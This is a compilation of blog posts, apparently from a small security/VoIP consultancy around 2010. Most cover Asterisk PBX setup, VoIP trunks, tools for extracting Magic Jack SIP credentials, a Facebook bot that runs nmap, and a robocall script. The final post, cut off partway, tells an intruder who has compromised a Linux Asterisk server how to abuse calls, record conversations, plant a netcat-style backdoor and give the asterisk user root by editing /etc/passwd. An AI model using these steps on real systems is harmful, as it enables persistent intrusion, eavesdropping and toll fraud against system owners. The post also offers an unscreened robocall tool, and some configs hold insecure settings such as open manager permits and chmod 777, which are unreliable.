4. Use the files app to browse the Phone files and locate z4root.1.3.0.apk
5. Click on z4root.1.3.0.apk you will be prompted with a security warning that you can’t run applications from a non-market source. Simply change that setting when the setup brings you to that screen
6. Next you will need to enable USB debugging.
7. Once you enable USB debugging re-run the app and overwrite the existing configuration
8. Click on permanent root and be patient.
9. Once done your phone will reboot and you now have root.

With root you can run apps like barnacle a free wifi tether app that I think is better than the tether app. Also you can run apps like shark (wire shark for the droid) and many other cool apps that Verizon does not want you to run.

To purchase this service click the buy it now button. In the comments put you’re State, City and Area code so we can give you a list of numbers available in your area. I there is no numbers available in your area (highly unlikely) we will refund you your money or find one closer to you. You can try the service for 90 days and if you don’t like it cancel it any time with in the first 90 days and you will be only charged for the minutes used, phone number, E911 and taxes.

Accounts can take up to 24 hours to setup and verify the buyer. You will need to fax a signed contract and TOS agreement back to us.

If you are a pen tester and want to do war dialing contact us for a special deal on using our service with warvox.

I figured it was about time that I showed what I have setup in my home for a phone system. This is only the start as new products come in and as budget allows we like to purchase new items to see how we can tie them into the system.

Our current wish list includes an IP based Door Phone / Bell. There are a few on the market but the price tags run from 150 to over 1,000 dollars.

Currently on our home phone system we are using our own VoIP service from our spin off company called VoIP My Way (http://www.voipmyway.com), which is fully up and running but we are currently working on pricing and a website. Our current thought process is to offer it like Magic Jack does with a mixture of what Whistle phone does. Basically for a low monthly fee you can have unlimited* calling to the US and Canada and basically won’t need any dongle. To help offset costs we are going to play a 15 to 20 second ad on all outbound calls. Ad free plans will be available as well.  At home we also use whistle phone as a backup trunk and for long calls to save costs.

We use to run a Magic Jack trunk on there as well but do to the recent changes we are still investigating how to get it to work again. For now it is disabled and the number forwards to our new number. Guess who will not be renewing with Magic Jack this coming year.

Our system currently runs on a Gateway Desktop computer that has 2 TB of space, 2 Gig of ram and a P4 3.8 processor, though the actual PBX runs in VMware Server on that desktop. The desktop also serves as our streaming media server, file server and general internet surfing. The VMware instance of our PBX is running PBX in a Flash, which is basically a modified version of CentOS, Asterisk and FreePBX compiled together into quick and easy to install PBX system. The VMware instance is configured with 20 gigabytes of hard drive space, 512 MB of memory and bridged networking. This setup currently supports anywhere from 1 caller up to 5 callers at any given time. Our biggest issue becomes bandwidth, depending what the kids are doing or I am downloading.

The PBX in a Flash and the firewall has been configured to work with NAT as described in our article located here: http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat/

For testing and daily use we have several types of phones tied into the system. The Cisco 7940 is automatically configured via a config file it pulls down from the TFTP server that runs on the PBX. The Android phone is a Motorola Droid X, it is running the newest version of SIPdroid that allows it use either 3G or WIFI to connect to the PBX to send and receive calls.  The laptop is running X-lite from Counter Path. On the laptop I also have my Bluetooth head set tied into it so I can talk as I work. Finally what I consider to be the cherry on top is the Linksys SIPura 2100. I spent a lot of time looking for a cheap way to tie my analog phones into my VoIP based PBX. Originally when I ran the PBX on its own hardware I was looking at purchasing a FXS card but for a good card with good call quality you were looking at over 100 + dollars.  That is what got me thinking about using an ATA to connect the phones to the VoIP PBX. After a few hours of eBay I got myself the Linksys SIPura for $10.00 and the rest of that story can be read in our upcoming article on how to configure the ATA to work on Asterisk. The ATA allows me to plug one line into my homes phone outlet to connect the phones in all the rooms. The other port we use for faxing.

As always if you have any questions or comments let us know.

With the latest round of rotating passwords from Magic Jack and no end in sight many are looking for other alternatives. I for one have started my own VoIP service after years of providing VoIP consulting services. I wanted something reliable. Though there are those out there that still want free solutions.

Whistle phone provides free phone service for those that are willing to listen to a 15 second commercial on every outbound call. To sign up for their service you must go to their site and download their client. Once you have downloaded and installed the client you will be able to register for their service. Make sure you register for the free service.

Once that is done you will now have all the SIP information you will need:

• Username is your 10 digit number with no dashes
• Password is the password you created for the account
• The SIP proxy is proxy.whistlephone.com

At this point you will have noticed that you do not have a local DID so this is where Google Voice comes into play: http://www.google.com/voice. Go the site and sign up for an account. You will need to have a phone that they can call and give you a registration code to complete the registration process.

I suggest signing in to your whistle phone and using that number in the registration process as we will be eventually pointing your Google Voice number to your whistle phone number so you will have a free local DID.

At this point you are ready to receive calls from your local DID and be able to place calls from you Whistle phone or whatever device you want to using your SIP credentials.

If you are using Asterisk with FreePBX here are the trunk settings you will need:

UPDATE THANKS TO VANHAM: (NEW TRUNK INFO)
The following are the settings I am currently using:
———————————————————————
Maximum Channels: 4

Trunk Name: whistle

PEER Details:

host=proxy.whistlephone.com
useragent=Whistle/Windows 1.20 (VailSIP 20100330)
type=peer
username=YOURDID
fromuser=YOURDID
defaultuser=YOURDID
secret=YOURSECRET
insecure=port,invite
nat=yes
qualify=2000
disallow=all
allow=ulaw
dtmfmode=rfc2833
defaultexpiry=60

USER Context: YOURDID

USER Details:

host=proxy2.whistlephone.com
useragent=Whistle/Windows 1.20 (VailSIP 20100330)
type=friend&friend
username=YOURDID
fromuser=YOURDID
defaultuser=YOURDID
secret=YOURSECRET
insecure=port,invite
nat=yes
qualify=2000
disallow=all
allow=ulaw
context=from-trunk-sip-whistle

Register String:

YOURDID:YOURSECRET@proxy.whistlephone.com:5060/YOURDID

—————————————————————————-
Maximum Channels: 4

Trunk Name: whistle2

PEER Details:

host=proxy.whistlephone.com
useragent=Whistle/Windows 1.20 (VailSIP 20100330)
type=peer
username=YOURDID
fromuser=YOURDID
defaultuser=YOURDID
secret=YOURSECRET
insecure=port,invite
nat=yes
qualify=2000
disallow=all
allow=ulaw
dtmfmode=rfc2833
defaultexpiry=60

USER Context: 1YOURDID

USER Details:

host=proxy2.whistlephone.com
useragent=Whistle/Windows 1.20 (VailSIP 20100330)
type=friend&friend
username=YOURDID
fromuser=YOURDID
defaultuser=YOURDID
secret=YOURSECRET
insecure=port,invite
nat=yes
qualify=2000
disallow=all
allow=ulaw
context=from-trunk-sip-whistle

Side note for the Magic Jack staff that I know visit the site, if you would just provide the SIP to us even if you charged 10 dollars more a year and no support for bring in your own device then we would not have to write these tools and you can make more money off of us.

Thanks

What is MJSIP version 2.0 beta:

After a very successful following our first version and recent changes to how Magic Jack is handling passwords and usernames we have decided to update our script with additional filters and added the ability to find your username as well since it is not always E_number_01.

What is new and why is this called beta:

Though we have tested this on over 40 + jacks from 10/20/2010 to as recently as of today we are have not allowed the general public to try it until now. That is why it is called beta. This version now includes the ability to retrieve your username.

What is required:

MJSIP: Our Perl script. This can be downloaded here: http://www.digitaloffensive.com/mj/mjsip2.zip. If you have our older ne overwrite it with this one.

SIPDump: Magic Jack stores all your SIP information in the programs memory during the startup process. SIPDump is a modified version of MemDump, which was originally developed by Stroth. You can download this tool here: http://www.digitaloffensive.com/mj/mj.rar

Active Perl: This is a free windows port of the Perl interpreter. It can be downloaded her for the 32 bit or 64 bit processor: http://www.activestate.com/activeperl/downloads. Download the msi file and install it, choose all the defaults.

How to use it:

Step 1: Download and extract all your tools to a folder on your system. Working out of one folder will make life so much easier.

Step 2: Use SIPDump.exe to dump the Memory of your Magic Jack. If you need more details on how to do this check out my article on this located here: http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/

Step3: Out of all the Magic Jack’s we have tested the 3^rd dump file was the most reliable at containing the password. I would strongly suggest you do not change that line in the MJSIP.pl file.

Step 4: Open a command prompt and navigate to the folder that you created that has all your tools in it. This folder should also contain you SIPDump files, unless you did not listen to my suggestions above. Once in that folder type the following command “perl mjsip.pl” This should dump your password and username to the screen.

What is SIPBAN:

SIPBAN is an addon for the advance policy firewall written by “R-FX Networks (http://www.rfxn.com)”. This addon is will search your asterisk logs for failed registration attempts from unknown networks and ban the IP address. This helps thwart SIP secret guessing and other SIP based attacks.

How to configure and use the script:

Configuration of the script is done by variables. The most important variables are gIP1 and gIP2. These variables are where you can define friendly networks not to ban. For example your work network is 192.168.2.x. So gIP1 would look like this gIP1=192.168.2. You could do just 192.168 but that leaves a lot of room for IP spoofing even though that is a RFC 1918 IP. You can use gIP2 for your home network or a remote office. To add more friendly networks just add more gIP variables in the variable section and edit line 15 of the script by adding an addition “ | grep –v “$gIP#” to the line right after the last one. Repeat this as much as you need to.

Once you made those changes save the script and change the permission of the script using chmod so it now executable.

Before you execute the script make sure you have “APF” installed and configured to your requirements. To configure APF for use in a PBX in environment leave egress filtering to “0” as in disabled and set ingress filtering to TCP 22, 80 and UDP 5060_6000 and 10000_20000. Once that is done make sure that APF is still in development mode . This insures that if you ban yourself or if you did not set the ports right you will be able to get back in after 5 minutes. Finally start APF by issuing the command apf –s.

Now that APF is running run a test of SIPBAN. To do this run the command ./sipban.sh. Nothing will show on the screen. Once it returns back to a command line you can view the log at /var/tmp/sipban.log. If everything looks successful then you can edit the APF config to take it out of development mode and restart APF.

At this point you are ready to schedule SIPBAN via the cron to run on whatever cycle you want. Since it is parsing a large log file I would do a minimum of 1 hour depending on how much ram your PBX has.

0 * * * * /root/sipban.sh

Where to get SIPBAN:

To get a copy of SIPBAN click the following link http://www.digitaloffensive.com/files/sipban.sh

If you have any questions or comments please feel free to contact us.

About:
AUTORAFI is a Linux shell script developed by Digital Offensive to either locally or remotely install an Asterisk based PBX solution with FreePBX front end. AUTORAFI was developed and tested on base installs of CentOS and Fedora Core.

Why:
Over the last few years we have been installing more and more of these solutions so we have taken the time to automate as much as we can to save time. Now we are offering AUTORAFI to the general public to make your lives easier.

Requirements:
1. System running either CentOS or Fedora Core.
2. SSH or console access
3. root access
4. Basic knowledge of Linux text editors
5. Internet access
6. Patience: install can take up to 1 ½ hours depending on your internet connection and your system configuration.
7. If you are running behind a firewall you will need to review this article for special firewall and FreePBX configuration: http://www.digitaloffensive.com/2010/05/overcoming-sip-over-nat

Use:
1. Copy the script to your server.
2. Use your favorite Linux text editor to change the user variables
a. Uncomment the following sections if they apply to you
i.Webmin: Lines 112-114
ii.DAHDI: Lines 180-185
3. Make sure it has a .sh extension
4. Chmod 777 script_name.sh
5. ./script_name.sh
6. Follow prompts!!
a. If you see warnings it is ok to proceed. It is when you see major errors, or failures that you need to stop the install.

Cost:
AutoRAFi costs $175.00. Since this is a digital product and the source is fully viewable there is no refund. We will work with you to correct any issues. To purchase this please visit our product page: Products

Support:
This script was developed and tested thoroughly on Fedora and CentOS. We ran it over 100x on each OS working out all the flaws.
We provide limited email support for free for this script. We plan to eventually offer a ticket system for this script if it is required. To get support please send a detail email with exact errors (Screen shots) to support@digitaloffensive.com
Free updates of this script will be provided to those that have purchased it.
If you need support configuring FreePBX, or anything else outside of this script and would like our help our hourly rate is $50.00 an hour. Min 2 hours.
Check out http://www.digitaloffensive.com for more info on our services.

For the time being we are offering SIP retrieval once again. Though once we pull your information we will test it and once tested and confirmed working payment will be non returnable. So if they change this a week from now you can not ask for a refund.

For those that want to do it themselves my articles will still help you do this. If you find my article useful please visit a sponsor or two as they help to pay for my time and hosting fees.

Side note is reports also state that the username for some is ending in 02.

Good Luck

FBCbot is a bot written in Perl to interface with Facebook on the users behalf. The bot is still in its infant stage and could definitely be improved upon. Currently FBCbot was developed on Linux though since it is written in Perl it can be modified to run on Windows as well. The FBCbot was developed in a way to allow for quick writing and adding of additional modules to it. Side note I am pretty new to programming in Perl, so if you see something that could be improved please let me know.

FBCbot works by checking all your friends status updates for key words that are predefined as commands in the bot. By default FBCbot comes with two modules. The “nmap” module allows users to post the command nmap xxx.xxx.xxx.xxx , where the xxx.xxx.xxx.xxx is the IP to NMAP. Once it is done scanning the IP it will post the results back to the wall of the user that issued the command. The “ping” module allows users to post the command pingpong xxx.xxx.xxx.xxx, where the xxx.xxx.xxx.xxx is the IP to PING. Once it is done pinging the IP it will post the results back to the wall of the user that issued the command.

To use FBCbot you will need to have a Perl interpreter installed on your operating system. I am currently using the default one that comes with Linux. You will need a way to schedule the bot to run, I currently use the cron to have it check every x amount of minutes. You will also need the Facebook command line application that was written by Dave Tompkins over at http://fbcmd.dtompkins.com/. This allows you to send commands via command line to Facebook as well as craft custom Facebook queries like you would do in SQL. Facebook command line runs on both Linux and Windows as well. Once you have this application you will need to overwrite the original fbcmd.php with my modified one. The modified one is provided in the zip along with FBCbot.pl: http://www.digitaloffensive.com/files/fbcbot.zip

I altered the original fbcmd.php file to add a common delimiter to the “fstatus” output to make separating the username and the command easier since the white space between the username and status is never the same. To do this I added “::” to be printed out right before the actual status

To add additional modules to FBCbot you can use the “elsif” syntax in Perl. Basically you would say

If $command = “x” then do “y” elsif $command =”a” then do “b” and so on. Just make sure to use proper syntax and close everything you open.

The current limitations to FBCbot are that it can only do 10 wall posts day. More than that will have it blocked for 48 hours. I am currently thinking of implementing a way that a user can provide an email address to have the results mailed to but that is a future though if more development is done FBCbot. I also need to take into consideration how to handle people leaving commands in their status over long periods of time.

We have been able to rule out the following false information that is circulating on the net. From the dumps and the traffic we captured they are still using proxy01 and the user account is still E########01.

Until we can get a few test Jacks to test with we are temporarily removing the SIP retrieval service.

If you have a jack you want to donate please contact us as we work on this issue.

Site verified secure! You see this on many sites out there. They all proudly display an image from a company saying that their site is scanned daily and has been determined secure. How many of these sites truly verify your site is secure? Have you checked your site lately?

While doing some research on a product I was interested in, I stumbled upon a cross site scripting vulnerability in the search box of the vendor’s website.  I was not to concern, as many search boxes on the internet are vulnerable to XSS.  I was about to move on until I noticed this iamge at the bottom of the page:

Interesting! According to McAfee, this site is Secure, but I have just proven it is not. So the first question that popped into my head is, what does McAfee consider secure and what is actually checked when using their service.

According to their service offering, they do the following to each site they monitor:

“* Network Security Audits are audits conducted to ascertain the compliance of network Devices with certain published security standards and to disclose security vulnerabilities and may include, but are not limited to, port scanning and port connections, evaluating services by checking versions and responses to certain requests, and crawling a website to perform testing of forms, application responses, or the confirm the existence of certain files.”

My understanding of the above is that they “do” provide the ability to readily check for cross site scripting vulnerabilities. Though for some reason they did not pick this up on the site I reviewed. So, I continued reading their user agreement to see what their responsibility is. Under the section that says: “No Guarantee” They basically state they do not offer any guarantee your site is secure and are not responsible for the security of your site.

On average the McAfee Secure service costs between a few hundred to a few thousand dollars, depending on the amount of traffic your website generates. The question is what are you paying for if they provide no assurance of the security of your site? In my honest opinion this is just a huge marketing ploy. You are paying large sums of money to display an “AD” on your site to say that your site is secure and promote their service, even if it may not be.  McAfee itself pushes this service saying it will “Increase your sales conversions by 12% with McAfee SECURE”.

I wonder how many companies that buy this service have a clue what they are truly buying.  I wonder how many of them actually run an audit themselves on their site to assure the safety of the data and clients. I wonder how many people have setup rules in their firewalls or IPS devices to alert them when these scans initiate to assure they are even getting scanned.

In defense of McAfee, I believe they probably do run a low end scan against the sites using a tool like Nessus or Nmap (probably actually something custom since they bought Foundstone, but still along the same line) that will check for ports and banners. I don’t think they are truly doing application level checking of sites as this is still not 100% reliable via automation. From my reading about their service since I do not have it, it seems that the end user has a lot of control in the setup and administration of their accounts. They can define the IP’s to scan as well as the policies to scan with. So the above issue and the issues I found on several of the sites displaying the “McAfee Secure” image could also be due to end users.

After all this research, I decided to contact McAfee and tell them about the issue. So I did a online chat session with a McAfee Secure tech. This is where I lost all respect for their service offering and what has caused me to write this article.

I started off asking them what they verify the site is secure against and the agent could not tell me. Next I told the agent that I found a site that displays their image, yet it contains a vulnerability. He asked for the sites info and I gave it to him. He then asked what the issue was and I told him I was able to execute cross site scripting on the site and redirect users to other sites and content. He had no idea what cross site scripting was. I gave him a example piece of JavaScript that would pop up a msg box saying “1”. He pasted the code in the box and his browser did not do anything or at least he said it did not. I told him I verified this issue on IE and Firefox. He could not tell me what browser he was using. I am expecting he was using something to block cross site scripting on the client side or McAfee was blocking it at the enterprise. At this point he told me my computer had issues and that site is secure if it is displaying the image. Below is a screen shot of the final part of our conversation.

To wrap this up make sure you know what you are buying. Don’t ever put full faith into any one security product or solution, everything out there has a hole or weakness. The age old saying “defense in depth” is still alive today.

I also contacted the sites that were vulnerable to XSS and included the response I got from McAfee. I told them to follow up with McAfee to have their issues resolved.

The Asterisk Desktop Assistant is a plug-in that allows you to be able to click on telephone numbers inside of Microsoft Office Products, Firefox and Thunder Bird. Once you click on the number it will ring your phone, once you answer it will then dial and connect you to the number you clicked.

The Asterisk Desktop Assistant can be found her for download: http://blogs.digium.com/2008/12/22/asterisk-desktop-assistant-windows-click-to-call-and-more/

Though Diginum provides a great website and a lot of data on how to install this plug-in their directions are extremely high level and it takes more tweaking then they have documentation on.

First thing to do is make sure that the firewall protecting your Asterisk box allows port 5038 inbound to it if you are using the ADA plug-in remotely. Next if working remotely makes sure that if you are behind a firewall that it allows port 5038 outbound.

Second we will need to make some changes to your Asterisk PBX.  I am going to assume that you are running a version of Asterisk that has FreePBX. If this is the case you will have to edit two files manually on the system as well as have at least 1 extension configured that you want to use.

1. The first file you will want to edit is /etc/asterisk/manager_custom.conf

You will want to add the following to the file:

[1001] <– This is the extension / username, change to fit your system

secret = ******  <– password to use

permit=0.0.0.0/0.0.0.0  <– Where to allow connections from. I suggest locking it down

deny=10.0.0.1/255.255.255.255  <– Where to deny connections from

read = system,call,log,verbose,command,agent,user <– permissions for the user on AGI

write = system,call,log,verbose,command,agent,user  <–permissions for the user on AGI

2. The next file you will want to edit is /etc/asterisk/extensions_custom.conf

You will want to add this to the bottom of that file:

[ada] <– context

include => from-internal

exten => 1001,1,Dial(SIP/1001) ßchange the 1001 to your extension

3. Now that is down issue the command asterisk –rx “core restart gracefully”

Third we will look at the actual install and configuration of the ADA plug-in on your windows system. The installation is pretty straight forward as you just click the setup and it installs. Once it is installed you will need to configure it to talk to your Asterisk box.

1. Install the ADA software. It can be downloaded here http://dl1.digium.com/ADA1.1/ADAInstall.exe; make sure that Firefox and any Microsoft application is closed before starting the install.

2. You will see it show up on your screen and in the lower right hand corner of your computer taskbar. To configure it simply right click on it and choose settings.

3. Only tab you need to worry about is the general tab where you will choose Asterisk and enter your Asterisk IP or hostname.

4. Choose Save Settings.

5. On the main screen enter the user name and password of the user you created above.

Fourth we will need to make some changes to the ADA system files for it to work with FireFox and ThunderBird.

1. There is a version restriction in the ADA software on what version of Firefox and Thunderbird it can work on. To get around this you will need to edit the following file in notepad: C:\Program Files\Digium\ADA\Mozilla\install.rdf. Look for the line <em:maxVersion> and change the number to something like 9.0 then save the file.

2. Next reboot the computer. Once the computer reboots your FireFox and Thunderbird will be ready to go.

Now you should see telephone numbers show up as links. If you hover over the links it should have a tag like this ada://717xxxxxxx. If you click that it will dial the number.

Fifth and final we will make the required changes to Microsoft Office. This will need to be done in each of the office products you run. At the time of writing this I am currently running Office 2007 at work and Office 2010 at home.

1. Click on the round office icon in the upper left hand column of the office product you are setting up.

2. Click on “That products name” options.

3. Click on Add-Ins

4. Click where it says Manage and choose “Smart Tags” and make sure to click on ADA (ADASmartTags) and then click on go.

5. Press ok.

Now you should be able to right click the number and choose dial.

If you have any questions comments or concerns please feel free to contact us. If you found this article useful please feel free to help support us.

AMJchan is a shell script written by the Digital Offensive team to quickly and accurately patch your Asterisk server for use with the Magic jack. This script was developed and tested on Centos, fedora and Redhat. The script can be easily altered to use another package manager other then yum to make it cross system compliant.

As many of you already know that to use a Magic Jack in any means other than the intended means  you are required to use a proxy. The Proxy facilitates the md5 hashing of the connection. In most cases people choose to use mjproxy, for Linux, some routers and ATA devices or MJMD5.exe for windows based systems. The actual patch was not developed by us and we cannot take credit for that. From my resources the patch was developed by 2 individuals DTM and Teddy_b. The patch allows you to run your Asterisk PBX without using a proxy.

AMJchan does the following for you:

1. Checks to find out what version of Asterisk you are running
2. Checks to make sure you have the needed tools (wget and patch)
3. Installs needed tools if you do not.
4. Downloads the Asterisk SRC that matches the version you have installed.
5. Downloads the Magic Jack chan_sip patch code.
6. Backups your original chan_sip.so and .c files
7. Patches the chan_sip
8. Makes the new chan_sip
9. Stops the asterisk process
10. Copies the new chan_sip into production
11. Restarts asterisk

To download the script click here: http://www.digitaloffensive.com/files/AMJchan.sh

AMJchan should be run as root to insure that you do not have any permission issues. The Digital Offensive does not take any responsibility for your use of this script.

If you have any questions or feedback please feel free to contact us and if this script helped you feel free to support us through a donation if you see fit.

Looking for someone that has the time, motivation and ability to generate leads and write proposals to help grow our business. This is a commission based position and due to that there is no benefits being offered. All commissions will be based on the final contract amount and paid after successful completion and payment of the contract. At the current time we are not taking applications from recruiters. All applicants must be at least 18 years old to apply.

You must have:

1. Good writing skills
2. Speaking skills
3. Basic understanding of computers. Knowledge of Information Security is a pro.
4. Must be US based and a citizen
5. Must be willing to sign a NDA

If you are interested in this position please send your resume to us.

What is it:

This simple shell script was created by Michael LaSalvia of Digital Offensive to auto dial numbers and plays back a message to the person that picks up the phone. This script will take a comma separated file (CSV) that is setup as follows:

Number,Sound,Trunk_Name

And automate the dialing and playing of that sound / message. The sound can be in the standard gsm format or an mp3 file.  This is useful for automating phone campaigns or just having a good time messing with friends.

How it works:

This script takes advantage of the Asterisk outgoing spool directory. The script creates a “call” file using the variables that you provided in the csv file as well as the variables you set in the script. The file is then moved into the /var/sppol/asterisk/outgoing directory where asterisk will process the “call” file and place the call.

The CSV file:

The CSV file is setup with three columns number, sound and trunk_name

The telephone number must not contain any – and must be the full 10 digit number for local and long distance calls. This may vary based on your dial plan.

To play custom sounds / messages you will need to create them and upload them to /var/lib/asterisk/sounds. Make sure that all the files you upload there that you chown them to asterisk.asterisk if your PBX is running as asterisk. When adding the sound to play in the CSV file do not add the extension just define the exact name.

To allow you to use different trunks to place your calls we added a column to define your trunks. If you only have one trunk then use that trunks name on each line

The CSV should look like this:

7175551111,campaign1,trunk1

7174442222,campaingn2,trunk2

And so on….

The shell script variables:

If you are not sure what you are doing please leave all the settings here along except nFile and nTrunk.

1. sounds: this variable defines the path to the asterisk sounds. You must upload your custom sounds /messages to this directory for them to play.
2. rOut: this variable defines the path to the asterisk outgoing spool directory.
3. rUser: this variable defines the user as asterisk.
4. rGroup: this variable defines the group as asterisk.
5. nFile: this variable defines the path and file name of your CSV file. You need to upload that file to a readable spot on your PBX.
6. rtry: this variable defines the max time to wait between trying to call a user back.
7. mtry: this variable defines the max number of times to try to call someone back.
8. stime: this variable defines the time to wait before calling the next number. This will help avoid congestion.

What is needed:

1. You will need an Asterisk based PBX.
   1. You will need to have an account that has the ability to access required directories and files. Preferably root.
   2. You will need to modify the /etc/asterisk/modules.conf file and add the line “load pbx_spool.so”
   3. You will need to have a copy of our script which can be downloaded here: http://www.digitaloffensive.com/files
   4. You will need a client to upload your sound / message files to the server with as well as your CSV file.

How to run:

To run this script you will need to either manually execute it daily or schedule it via cron.

Current issues:

Since I do not have access to the do not call lists database I cannot add the functionality to check your CSV file against the do not call list. With that being stated I do not take any responsibility for your actions with this script.

Up to recently we use to pay a third party SEIM provider to provide us reporting for all our site to site VPN tunnels. This is due to an audit requirement we had that said that our system administrators had to report on any time their vendor connected to the tunnel. If they connected they had to provide the start date & time, the end date & time, the duration of the connection, the source address and destination address, the protocol & port as well as the tunnel name.

Due to the cost of the third party SEIM provider as well as their not so wonderful service we decided to find a replacement. The only issue is the replacements we found all cost over 100,000 a year. This is when Michael Yan and I set forth to develop our own solution.

We are happy to bring you “CP-VPN-Auto-Audit 1.0”. This system is compromised of 4 scripts that run together to export your logs, format them into individual tunnel csv reports and then email them to the system administrators.

To use these scripts you will need the following:

1. You must be running the SPLAT operating system on your management server
2. You must install active Perl on your mgmt server.
3. You must have a SSH key pair setup with another Linux box that has the ability to mail files. (This is useful for log backups and automated upgrade_exports as well).
4. Understanding of basic Perl, Linux and Shell scripting.
5. You must configure your logs to rotate nightly at midnight and make sure to do a install database to apply the settings.

How to install Active Perl on your Mgmt server:

Since the Splat Operating system is just a striped down secured version of Red Hat Linux you are able to install some dependency limited RPM packages.

1. Log into your mgmt server and escalate your privileges to “expert”
2. Download the RPM that is right for your processor architect: http://www.activestate.com/activeperl/downloads. This file needs to be downloaded to a box that has either a SSH server running or an ftp server running since your mgmt station will not have wget, curl or lynx. But you do have SCP and FTP
3. From your mgmt server copy the RPM over to /root.
4. Issue the command “rpm –ivh file_name.rpm” to install
5. Next we will have to edit our environment so the Splat operating system will detect it.
   1. Use your favorite Linux editor to edit the file $FWDIR/tmp/.CPprofile.sh
   2. Find the line “PATH=${PATH}:${FWDIR}/bin:” and modify it to PATH=${PATH}:${FWDIR}/bin:/opt/ActivePerl-5.10/bin ; (change to version number that matches your Perl version).
   3. Log out of your mgmt server, log back in and escalate your privilege to “expert”
   4. Execute the command “which perl” You should get a path back if it worked.

Installation of the Perl script on the mgmt server:

On the mgmt server you will need to copy the logstrap.pl and the vpn-audit.pl to the /root directory. Once you have the files copied there you will need to modify them to match your version of checkpoint , the log output directory, the remote server name and account. I normally like to use variables but in this project the use of variables seemed to add so many headaches and countless additional hours of trouble shooting.

Inside look at logstrap.pl: Download code here: http://www.digitaloffensive.com/files

The code is heavily documented so to keep this document clean just search for the lines below to see the code:

#Get Yesterday Date:  This code will get the server time and convert it from epoch and format it to a usable format for us. It will also add a 0 in front of any day value that has only 1 character.

#Create shell script to use *CheckPoint Environment* and Process the log export for yesterday log: This code will create the shell script called execute-me.sh. This script will define the CheckPoint environment and process the day before account logs using the fwm logexport command. Next since the cron will spawn a new shell when we declare the CheckPoint environment we need a script that will launch the rest of the code for us in the new shell, this script does that for us by call /root/vpn-audit.pl.

Inside look at vpn-audit.pl: Download code here: http://www.digitaloffensive.com/files

The code is heavily documented so to keep this document clean just search for the lines below to see the code:

#Get Yesterday Date:  This code will get the server time and convert it from epoch and format it to a usable format for us. It will also add a 0 in front of any day value that has only 1 character.

#Logs to use: This code will open all the log files that we will use to separate the log file into individual csv files, 1 per vpn tunnel that we have.

#Printing header: This code will add a header to each of the csv files. This allows for easy filtering of results and also makes understanding what data is in each column.

# Find Column numbers based on column names since *CheckPoint changes the column numbers daily*: This code will resolve the issue of where the column numbers found in the CheckPoint logs change daily. Instead of using a preset number we find the column name and then find what column that is associated with.

#Process individual reports: This is the part of the code where we process each VPN tunnel into and individual report using regular expression matching and unique tunnel names.

#Close all open logs: This code will close all the logs that we have opened.

# Tar files and move them to server to be emailed: This code will make use of the SSH keys we have established with our other Linux box. It will tar up the logs and transfer them to the other box. It will also clean up all the logs we just created as well as call the mail.sh code located on the other box.

Inside look at the crontab entry on the mgmt server:

To edit your crontab use the command “crontab –e”

45 11 * * * /root/logstrap.pl >& /var/log/cron.err

Since we use GMT time I have to set the cron 4 hours in the future from the time I want to execute the script. We output the results to /var/log/cron.err for error checking and debugging.

Installation of mail.sh on your other Linux server: Download code here: http://www.digitaloffensive.com/files

Remember on this server you have already confirmed that you can send email from it.

1. Log on to the box as the user that you established the SSH key pair with.
2. Create a directory called vpn.
3. Copy the mail.sh code into that directory.
4. chmod –Rf 777 /user/vpn

Inside look at mail.sh:

##Variables: This section will allow you to define the following:

1. The path to the csv files
2. The mail recipient.
3. The email message body.
4. The subject line of the email.

## Do not edit below this line: This section of the code contains a loop that will mail all the csv files as attachments until it is done. It will also clean up and remove all the tars and csv files after it sends them out.

What is it:

MJSIP is a simple Perl script written by a co-worker and myself. This script uses regular expression matching to automate the finding of your SIP password in the dump file.

MJSIP has been tested on over 50 Jacks that were purchased and registered this month (6/07/10). Each Magic Jack we tested worked flawlessly.

Though this tool has been tested and we have worked out many of the bugs there are two conditions that we are aware of that will cause MJSIP not to return a password back to you. The first condition is if you dumped the memory wrong using the SIPDump tool. The second condition is if your Magic Jack password contains the same letter or number more than 4 x in a row.

What is required:

MJSIP: Our Perl script. This can be downloaded here: http://www.digitaloffensive.com/mj/mjsip.zip

SIPDump: Magic Jack stores all your SIP information in the programs memory during the startup process. SIPDump is a modified version of MemDump, which was originally developed by Stroth. You can download this tool here: http://www.digitaloffensive.com/mj/mj.rar

Active Perl: This is a free windows port of the Perl interpreter. It can be downloaded her for the 32 bit or 64 bit processor: http://www.activestate.com/activeperl/downloads. Download the msi file and install it, choose all the defaults.

How to use it:

Step 1: Download and extract all your tools to a folder on your system. Working out of one folder will make life so much easier.

Step 2: Use SIPDump.exe to dump the Memory of your Magic Jack. If you need more details on how to do this check out my article on this located here: http://www.digitaloffensive.com/2010/03/hacking-the-magic-jack-in-2010-for-use-on-trixbox-or-any-other-sip-device/

Step3: Out of all the Magic Jack’s we have tested the 3^rd dump file was the most reliable at containing the password. I would strongly suggest you do not change that line in the MJSIP.pl file.

Step 4: Open a command prompt and navigate to the folder that you created that has all your tools in it. This folder should also contain you SIPDump files, unless you did not listen to my suggestions above. Once in that folder type the following command “perl mjsip.pl” This should dump your password to the screen.

If you found this tool helpful please feel free to either visit one of our sponsors or donate by clicking here.

If you have questions, concerns or ideas to automate more or add to it feel free to contact us.

Like most programs Asterisks offers the ability to launch system commands from with inside the application. This means it is possible for either a developer or a malicious person to execute system commands by simply editing the dial plan and making a phone call.

This is nothing new the ability to execute system commands from within an Asterisk based PBX has been around since it was first developed. A quick Google on the topic of “Asterisk system command” shows me that it has at least been documented since 2007 according to the article found here:

http://www.voip-info.org/wiki/index.php?page_id=166

This article goes into great detail explaining how to set this up. The article also points out how this is insecure and provides a few additional dial plans that can be used to help thwart this command from being abused.

My article is going to look at this from the malicious standpoint and how to create a true phone home.

So you have just popped a Linux box and noticed that is running Asterisk besides the normal mischief you can cause such as racking up long distance calls and recording conversations. Let’s make sure you can get back in any time you want by simply making a call.

Via Command line:

Step 1: Download and compile a copy of snetcat (http://snetcat.sourceforge.net/ ) locally. This is a secure free replacement to netcat (the good version that gave you the –e flag). This tool can be statically compiled and will work on any Linux based system. Once you do this you can host this file somewhere that you can easily access it later.

Step 2: Decide if you want to have root access via Asterisk. If so a simple trick would be to edit the /etc/passwd file and change your group and user number to 0:0 and save the file. Now the asterisk user will have the same level as root.

This is not needed to have fun with just the phone system.

